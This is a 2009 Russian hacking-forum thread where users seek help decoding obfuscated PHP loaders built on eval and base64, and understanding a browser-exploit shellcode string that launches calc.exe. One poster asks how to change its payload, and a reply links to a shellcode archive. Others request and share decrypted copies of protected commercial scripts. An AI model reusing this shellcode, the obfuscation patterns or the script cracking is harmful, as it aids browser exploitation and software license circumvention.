Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.11.2009, 05:58
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706
Репутация:
-1
|
|
Сообщение от BlackSun
1. Вырезаем пробелы
2. Приводим скрипт к более читаемому виду, а именно деобфусицируем имена функций
PHP код:
// было
$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
/*echo '<br>'.*/$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
/*echo '<br>'.*/$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
/*echo '<br>'.*/$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};
/*echo '<br>'.*/$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};
/*echo '<br>'.*/$O0O000O0O=$O0O000O00.$OOO000000{11};
/*echo '<br>'.*/$O0O000O00=$O0O000O00.$OOO000000{3};
/*echo '<br>'.*/$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
/*echo '<br>'.*/$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};
$OOO0O0O00=__FILE__;
$OO00O0000=14324;
PHP код:
// стало
$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
// base64_decode $OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
// fopen $OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};
// fget $O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};
// fgetc $O0O000O0O=$O0O000O00.$OOO000000{11};
// fgets $O0O000O00=$O0O000O00.$OOO000000{3};
// fread $O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
// strtr $OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};
// $self - это закодированный файл, вырезано все до самого ?>
/*$OOO0O0O00*/ $self='/var/www/php.old';
/*$OO00O0000*/ $start=14324;
ЗЫ: Чет не догнал,как ты деобфусцировал их.И потом,где этот eval() ? Одни иероглифы...чет я упускаю из виду.Мб книга есть какая по обфускации/деобфускации средствами пыхыпы ?
|
|
|
28.11.2009, 09:21
|
|
Познающий
Регистрация: 06.12.2008
Сообщений: 30
Провел на форуме:
291784
Репутация:
0
|
|
помогите расшифровать )
PHP код:
<?php
$V254778035="5rautq+ooKnu7/3m";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLUmxsNlRrUlZNMDU2UlRCT2VrazVXVzFHZWxwVVdUQllNbEpzV1RJNWExcFRaMmxYVnpGSFpXeHdWVmRVUWxsTmJFcHpWMVJKTldFeGNGSlFWREJwUzFSemExWnFVWGhOVkZWNVRsUlJkMDVFTVdsWldFNXNUbXBTWmxwSFZtcGlNbEpzUzBOS2FrMHhTalZaYTJSWFpGTkpjRTk1VWxkT2VrazBUbnBuZWs1cVZUUlFWMHBvWXpKVk1rNUdPV3RhVjA1MldrZFZiMGxzYTNsaFNHdHBTMVJ6YTFacVozaE5SRlYzVFVSamVFNXFNV2xaV0U1c1RtcFNabHBIVm1waU1sSnNTME5LYVUwd2NISkphV3MzU2taWk5VNUVTVEJPZWxFd1RsUm5PVmx0Um5wYVZGa3dXREpTYkZreU9XdGFVMmRwVjJwT2QyTkhTblJYYms1YVYwWktjMGxwYXpjaUtTazdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLUmxsNVRsUlJNMDU2WjNkTmVsVTVTa1paZWs1RVZUTk9la1V3VG5wSmIwcEdXWGxPVkZFelRucG5kMDE2VlhCUGVWSlhUbFJyTWs1NmF6UlBWRkY1VUZOU1YwNUVSWGhPVkVreFRrUkJNRXREVWxkTmFsVXdUbnBqTkUxRVRURkxWSE05SWlrcE93PT0iKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKRll4TkRRek16STVOelU5SnljN1ptOXlLQ1JXTmpBME9UWXpPRFl6UFRBN0pGWTJNRFE1TmpNNE5qTThKRlkxT1RZM09UZzVOREk3SkZZMk1EUTVOak00TmpNckt5bDdKRll4TkRRek16STVOelV1UFNSV056STROemd6TmpVNEtDZ2tWamd4TURVd01EY3hOaWdrVmpJMU5EYzNPREF6TlZza1ZqWXdORGsyTXpnMk0xMHBYakUwTkRrME9UZzFOallwS1R0OVpYWmhiQ2drVmpFME5ETXpNamszTlNrNyIpKTs="));
?>
|
|
|
|
28.11.2009, 13:34
|
|
Reservists Of Antichat - Level 6
Регистрация: 23.08.2007
Сообщений: 1,237
Провел на форуме:
18127311
Репутация:
1676
|
|
|
|
|
|
28.11.2009, 15:48
|
|
Новичок
Регистрация: 04.12.2006
Сообщений: 7
Провел на форуме:
25000
Репутация:
0
|
|
нужна помощь в расшифровке, помогите кто может.
есть код типа:
Код:
//------------------Replace with your code-----------------------//
var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u 184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84 AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575 %u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u 018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C 78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0 %u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u 7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u00 63");
//------------------Replace with your code-----------------------//
пытаюсь вывести на экран document.write (), но получаю иероглифы.
нашел конвертер UCS2 to HEX, результат радужнее предыдущего:
Код:
FCE8 4400 0000 8B45 3C8B 7C05 7801 EF8B 4F18 8B5F 2001 EB49 8B34 8B01 EE31 C099 AC84 C074 07C1 CA0D 01C2 EBF4 3B54 2404 75E5 8B5F 2401 EB66 8B0C 4B8B 5F1C 01EB 8B1C 8B01 EB89 5C24 04C3 31C0 648B 4030 85C0 780C 8B40 0C8B 701C AD8B 6808 EB09 8B80 B000 0000 8B68 3C5F 31F6 6056 89F8 83C0 7B50 687E D8E2 7368 98FE 8A0E 57FF E763 616C 6300
но хотелось бы привести к более читаемому результату. Объясните пожалуйста как это сделать!
Заранее благодарю!)
ps вообще, объясните, что делает данный код? то что он запускает calc.exe, я знаю. хочу знать как он это делает и как можно его изменить чтоб, например, он запускал блокнот))
Последний раз редактировалось anticoder; 28.11.2009 в 15:57..
|
|
|
|
28.11.2009, 17:31
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940
Репутация:
1257
|
|
anticoder, имя переменной "Shellcode" кагбэ намекает, что там записан байт-код, который исполняется уязвимым браузером при переполнении буффера. Так что твой HEX код ты можешь записать файл и открыть в любом дизасемблере.
а вот тебе немного шеллкодов: http://www.shell-storm.org/shellcode/
|
|
|
|
29.11.2009, 04:48
|
|
Новичок
Регистрация: 15.11.2008
Сообщений: 2
Провел на форуме:
2645
Репутация:
0
|
|
Kaimi
Расшифруй, пожалуйста, файлы http://rapidshare.com/files/313611288/upload.rar.html
|
|
|
|
29.11.2009, 05:02
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Кто нибудь сможет расшифровать перловый скрипт гостевой книги Mbook ???
Может найдётся какой нибудть уневерсальный дешифратор пэрлового кода всех этих скриптов, очень давно ищю.
Кто поможет, буду очень благодарен.
PS: вот скрипты гостевухи:
http://www.sendspace.com/file/13flo4
|
|
|
|
30.11.2009, 13:47
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 36
Провел на форуме:
102286
Репутация:
8
|
|
Сообщение от Wanderercom
Kaimi
Расшифруй, пожалуйста, файлы http://rapidshare.com/files/313611288/upload.rar.html
Держи
upload_new.rar
http://www.sendspace.com/file/twf2c6
|
|
|
|
30.11.2009, 15:46
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 36
Провел на форуме:
102286
Репутация:
8
|
|
кому что ещё надо? пишите
|
|
|
|
30.11.2009, 15:50
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от Dragon_X
кому что ещё надо? пишите
Сообщение от Nightmarе
Кто нибудь сможет расшифровать перловый скрипт гостевой книги Mbook ???
Может найдётся какой нибудть уневерсальный дешифратор пэрлового кода всех этих скриптов, очень давно ищю.
Кто поможет, буду очень благодарен.
PS: вот скрипты гостевухи:
http://www.sendspace.com/file/13flo4
если конечно возможно.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
